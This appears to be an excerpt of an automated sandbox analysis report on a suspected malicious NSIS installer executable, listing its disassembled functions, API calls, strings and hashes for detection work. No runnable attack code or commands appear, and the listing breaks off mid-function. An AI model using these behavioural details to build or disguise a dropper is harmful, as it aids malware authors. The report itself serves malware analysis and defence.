                                                                            • Associated: 00000000.00000002.13418225620.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: Find$CloseFileFirst
                                                                            • String ID: C:\
                                                                            • API String ID: 2295610775-3404278061
                                                                            • Opcode ID: d30bbc16997dfcf9f9a572ec6341a2188e66bfdc939d37fad3f946c8dc482195
                                                                            • Instruction ID: 4d264840bddbdcf8954fb0232b098af143b8be61859f100819b52cc90bd9207d
                                                                            • Opcode Fuzzy Hash: d30bbc16997dfcf9f9a572ec6341a2188e66bfdc939d37fad3f946c8dc482195
                                                                            • Instruction Fuzzy Hash: AAD0127595A1205BC71197787C0C84B7A589B053307114A32F46AF22E0D6349C7686E9
                                                                            Function 00403720 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 128 403720-403738 call 406139 131 40373a-40374a call 405cfe 128->131 132 40374c-40377d call 405c87 128->132 140 4037a0-4037c9 call 4039e5 call 405900 131->140 136 403795-40379b lstrcatA 132->136 137 40377f-403790 call 405c87 132->137 136->140 137->136 146 403850-403858 call 405900 140->146 147 4037cf-4037d4 140->147 153 403866-40388b LoadImageA 146->153 154 40385a-403861 call 405dc2 146->154 147->146 148 4037d6-4037fa call 405c87 147->148 148->146 158 4037fc-4037fe 148->158 156 40390c-403914 call 40140b 153->156 157 40388d-4038bd RegisterClassA 153->157 154->153 171 403916-403919 156->171 172 40391e-403929 call 4039e5 156->172 159 4038c3-403907 SystemParametersInfoA CreateWindowExA 157->159 160 4039db 157->160 162 403800-40380d call 40583d 158->162 163 40380f-40381b lstrlenA 158->163 159->156 165 4039dd-4039e4 160->165 162->163 166 403843-40384b call 405812 call 405da0 163->166 167 40381d-40382b lstrcmpiA 163->167 166->146 167->166 170 40382d-403837 GetFileAttributesA 167->170 174 403839-40383b 170->174 175 40383d-40383e call 405859 170->175 171->165 181 4039b2-4039ba call 40508b 172->181 182 40392f-403949 ShowWindow call 4060cb 172->182 174->166 174->175 175->166 187 4039d4-4039d6 call 40140b 181->187 188 4039bc-4039c2 181->188 189 403955-403967 GetClassInfoA 182->189 190 40394b-403950 call 4060cb 182->190 187->160 188->171 193 4039c8-4039cf call 40140b 188->193 191 403969-403979 GetClassInfoA RegisterClassA 189->191 192 40397f-4039b0 DialogBoxParamA call 40140b call 403670 189->192 190->189 191->192 192->165 193->171
                                                                            APIs
                                                                              • Part of subcall function 00406139: GetModuleHandleA.KERNEL32(?,?,?,004031EA,00000009), ref: 0040614B
                                                                              • Part of subcall function 00406139: GetProcAddress.KERNEL32(00000000,?), ref: 00406166
                                                                            • lstrcatA.KERNEL32(1033,0079E540,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079E540,00000000,00000002,765F3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\nRNzqQOQwk.exe",00000000), ref: 0040379B
                                                                            • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\slavelivets,1033,0079E540,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079E540,00000000,00000002,765F3410), ref: 00403810
                                                                            • lstrcmpiA.KERNEL32(?,.exe), ref: 00403823
                                                                            • GetFileAttributesA.KERNEL32(Call), ref: 0040382E
                                                                            • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\slavelivets), ref: 00403877
                                                                              • Part of subcall function 00405CFE: wsprintfA.USER32 ref: 00405D0B
                                                                            • RegisterClassA.USER32(007A16E0), ref: 004038B4
                                                                            • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004038CC
                                                                            • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403901
                                                                            • ShowWindow.USER32(00000005,00000000), ref: 00403937
                                                                            • GetClassInfoA.USER32(00000000,RichEdit20A,007A16E0), ref: 00403963
                                                                            • GetClassInfoA.USER32(00000000,RichEdit,007A16E0), ref: 00403970
                                                                            • RegisterClassA.USER32(007A16E0), ref: 00403979
                                                                            • DialogBoxParamA.USER32(?,00000000,00403AB2,00000000), ref: 00403998
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.13417502270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417566610.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                            • String ID: "C:\Users\user\Desktop\nRNzqQOQwk.exe"$.DEFAULT\Control Panel\International$.exe$1033$@y$C:\Users\user\AppData\Local\Temp\$C:\Users\user\slavelivets$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                            • API String ID: 1975747703-1364596019
                                                                            • Opcode ID: 72abac218aef0aa68c8201db2a2c7bc2da9bafc71593619d8738dd7e58f1acdc
                                                                            • Instruction ID: 69823c21e20ed545a36681f3e22a73ce5ba8c54c43716b07ce110ef4df70eff0
                                                                            • Opcode Fuzzy Hash: 72abac218aef0aa68c8201db2a2c7bc2da9bafc71593619d8738dd7e58f1acdc
                                                                            • Instruction Fuzzy Hash: 1361D6B5544240AEE310BF619C45F3B3AACEB85789F40857FF941B22E2D77D9D018A2D
                                                                            Function 00402CFA Relevance: 28.2, APIs: 5, Strings: 11, Instructions: 182COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 202 402cfa-402d48 GetTickCount GetModuleFileNameA call 405a13 205 402d54-402d82 call 405da0 call 405859 call 405da0 GetFileSize 202->205 206 402d4a-402d4f 202->206 214 402d88 205->214 215 402e6f-402e7d call 402c96 205->215 207 402f2c-402f30 206->207 217 402d8d-402da4 214->217 221 402ed2-402ed7 215->221 222 402e7f-402e82 215->222 219 402da6 217->219 220 402da8-402db1 call 403122 217->220 219->220 227 402db7-402dbe 220->227 228 402ed9-402ee1 call 402c96 220->228 221->207 225 402e84-402e9c call 403138 call 403122 222->225 226 402ea6-402ed0 GlobalAlloc call 403138 call 402f33 222->226 225->221 249 402e9e-402ea4 225->249 226->221 253 402ee3-402ef4 226->253 231 402dc0-402dd4 call 4059ce 227->231 232 402e3a-402e3e 227->232 228->221 240 402e48-402e4e 231->240 251 402dd6-402ddd 231->251 239 402e40-402e47 call 402c96 232->239 232->240 239->240 244 402e50-402e5a call 4061ae 240->244 245 402e5d-402e67 240->245 244->245 245->217 252 402e6d 245->252 249->221 249->226 251->240 255 402ddf-402de6 251->255 252->215 256 402ef6 253->256 257 402efc-402f01 253->257 255->240 258 402de8-402def 255->258 256->257 259 402f02-402f08 257->259 258->240 260 402df1-402df8 258->260 259->259 261 402f0a-402f25 SetFilePointer call 4059ce 259->261 260->240 263 402dfa-402e1a 260->263 264 402f2a 261->264 263->221 265 402e20-402e24 263->265 264->207 266 402e26-402e2a 265->266 267 402e2c-402e34 265->267 266->252 266->267 267->240 268 402e36-402e38 267->268 268->240
                                                                            APIs
                                                                            • GetTickCount.KERNEL32 ref: 00402D0B
                                                                            • GetModuleFileNameA.KERNELBASE(00000000,C:\Users\user\Desktop\nRNzqQOQwk.exe,00000400), ref: 00402D27
                                                                              • Part of subcall function 00405A13: GetFileAttributesA.KERNELBASE(?,00402D3A,C:\Users\user\Desktop\nRNzqQOQwk.exe,80000000,?), ref: 00405A17
                                                                              • Part of subcall function 00405A13: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405A39
                                                                            • GetFileSize.KERNEL32(00000000,00000000,007AA000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\nRNzqQOQwk.exe,C:\Users\user\Desktop\nRNzqQOQwk.exe,80000000,?), ref: 00402D73
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.13417502270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417566610.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                            • String ID: T$"C:\Users\user\Desktop\nRNzqQOQwk.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\nRNzqQOQwk.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$`i$soft
                                                                            • API String ID: 4283519449-3998746164
                                                                            • Opcode ID: 01abee4385eb3164d7f4254af187e376370b625cc9aa48c6f885a033e7c9399e
                                                                            • Instruction ID: 3261349ff2f4a6e0e52cb66aedc5a428c749111a9fc88119453a55b84fe8b48b
                                                                            • Opcode Fuzzy Hash: 01abee4385eb3164d7f4254af187e376370b625cc9aa48c6f885a033e7c9399e
                                                                            • Instruction Fuzzy Hash: 9A510671940215AFDB119F60DE89B9E7BB8EB44364F20413BF904B62D1D7BC8D408B9D
                                                                            Function 00401759 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 600 401759-40177c call 402ace call 40587f 605 401786-401798 call 405da0 call 405812 lstrcatA 600->605 606 40177e-401784 call 405da0 600->606 611 40179d-4017a3 call 40600b 605->611 606->611 616 4017a8-4017ac 611->616 617 4017ae-4017b8 call 4060a4 616->617 618 4017df-4017e2 616->618 626 4017ca-4017dc 617->626 627 4017ba-4017c8 CompareFileTime 617->627 620 4017e4-4017e5 call 4059ee 618->620 621 4017ea-401806 call 405a13 618->621 620->621 628 401808-40180b 621->628 629 40187e-4018a7 call 404fb9 call 402f33 621->629 626->618 627->626 630 401860-40186a call 404fb9 628->630 631 40180d-40184f call 405da0 * 2 call 405dc2 call 405da0 call 405596 628->631 643 4018a9-4018ad 629->643 644 4018af-4018bb SetFileTime 629->644 641 401873-401879 630->641 631->616 663 401855-401856 631->663 645 402967 641->645 643->644 647 4018c1-4018cc CloseHandle 643->647 644->647 650 402969-40296d 645->650 648 4018d2-4018d5 647->648 649 40295e-402961 647->649 652 4018d7-4018e8 call 405dc2 lstrcatA 648->652 653 4018ea-4018ed call 405dc2 648->653 649->645 659 4018f2-4022d8 652->659 653->659 664 4022dd-4022e2 659->664 665 4022d8 call 405596 659->665 663->641 666 401858-401859 663->666 664->650 665->664 666->630
                                                                            APIs
                                                                            • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\slavelivets,00000000,00000000,00000031), ref: 00401798
                                                                            • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\slavelivets,00000000,00000000,00000031), ref: 004017C2
                                                                              • Part of subcall function 00405DA0: lstrcpynA.KERNEL32(?,?,00000400,0040322E,Pongids Setup,NSIS Error), ref: 00405DAD
                                                                              • Part of subcall function 00404FB9: lstrlenA.KERNEL32(0079DD20,00000000,0078FCF8,765F23A0,?,?,?,?,?,?,?,?,?,0040306B,00000000,?), ref: 00404FF2
                                                                              • Part of subcall function 00404FB9: lstrlenA.KERNEL32(0040306B,0079DD20,00000000,0078FCF8,765F23A0,?,?,?,?,?,?,?,?,?,0040306B,00000000), ref: 00405002
                                                                              • Part of subcall function 00404FB9: lstrcatA.KERNEL32(0079DD20,0040306B,0040306B,0079DD20,00000000,0078FCF8,765F23A0), ref: 00405015
                                                                              • Part of subcall function 00404FB9: SetWindowTextA.USER32(0079DD20,0079DD20), ref: 00405027
                                                                              • Part of subcall function 00404FB9: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040504D
                                                                              • Part of subcall function 00404FB9: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405067
                                                                              • Part of subcall function 00404FB9: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405075
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.13417502270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417566610.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsj1A28.tmp$C:\Users\user\AppData\Local\Temp\nsj1A28.tmp\System.dll$C:\Users\user\slavelivets$Call
                                                                            • API String ID: 1941528284-2519843916
                                                                            • Opcode ID: 17cbd14428586f76d7af50b729a9077a322d321e92e24f8c2541e02e22effdf4
                                                                            • Instruction ID: dbbb128bf7935f0aed0e50e9380fc9841c9442f81e714e1827c6660095eaabca
                                                                            • Opcode Fuzzy Hash: 17cbd14428586f76d7af50b729a9077a322d321e92e24f8c2541e02e22effdf4
                                                                            • Instruction Fuzzy Hash: FE41E772910515BACB107BB5CC49DAF7AB9EF45368B20C23BF121F10E1C77C8A418A6D
                                                                            Function 0040547F Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 39COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 667 40547f-4054ca CreateDirectoryA 668 4054d0-4054dd GetLastError 667->668 669 4054cc-4054ce 667->669 670 4054f7-4054f9 668->670 671 4054df-4054f3 SetFileSecurityA 668->671 669->670 671->669 672 4054f5 GetLastError 671->672 672->670
                                                                            APIs
                                                                            • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004054C2
                                                                            • GetLastError.KERNEL32 ref: 004054D6
                                                                            • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004054EB
                                                                            • GetLastError.KERNEL32 ref: 004054F5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.13417502270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417566610.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$ds@$ts@
                                                                            • API String ID: 3449924974-2230009264
                                                                            • Opcode ID: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
                                                                            • Instruction ID: 09fe99030eccae78cb9d2ce19bbf77f9f972de75acbbd1990c032815ad2a971a
                                                                            • Opcode Fuzzy Hash: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
                                                                            • Instruction Fuzzy Hash: 2F010871D14259EADF119BA4C944BEFBFB8EB14315F00417AE904B6280E378A644CFAA
                                                                            Function 00401D95 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetDC.USER32(?), ref: 00401D98
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DB2
                                                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401DBA
                                                                            • ReleaseDC.USER32(?,00000000), ref: 00401DCB
                                                                            • CreateFontIndirectA.GDI32(0040A7F0), ref: 00401E1A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.13417502270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417566610.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                                                            • String ID: Times New Roman
                                                                            • API String ID: 3808545654-927190056
                                                                            • Opcode ID: 648d7b0dc9db80ea036042f47a1e498ac7e57b814f90c6129580178fecebfba8
                                                                            • Instruction ID: 37723da549b7de6e047f5ddf6566bf04a0332ae81d9da388354d8b2e576e77f8
                                                                            • Opcode Fuzzy Hash: 648d7b0dc9db80ea036042f47a1e498ac7e57b814f90c6129580178fecebfba8
                                                                            • Instruction Fuzzy Hash: 3A015272948340AFE7006B70AE49F9A3FF4AB55315F10847AF241B62E2C6B904569B3E
                                                                            Function 004060CB Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 682 4060cb-4060eb GetSystemDirectoryA 683 4060ed 682->683 684 4060ef-4060f1 682->684 683->684 685 406101-406103 684->685 686 4060f3-4060fb 684->686 687 406104-406136 wsprintfA LoadLibraryExA 685->687 686->685 688 4060fd-4060ff 686->688 688->687
                                                                            APIs
                                                                            • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004060E2
                                                                            • wsprintfA.USER32 ref: 0040611B
                                                                            • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040612F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.13417502270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417566610.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                            • String ID: %s%s.dll$UXTHEME$\
                                                                            • API String ID: 2200240437-4240819195
                                                                            • Opcode ID: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
                                                                            • Instruction ID: e39d6de12310bdbc02ec2e887020ee50980fcceaee6e7f6f8e64b4e94942106c
                                                                            • Opcode Fuzzy Hash: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
                                                                            • Instruction Fuzzy Hash: 80F0FC30A40115A6EF1497A4DC0DFEB365CAB08305F140176A547E51D2D5B8E9248B69
                                                                            Function 00402F33 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 161COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
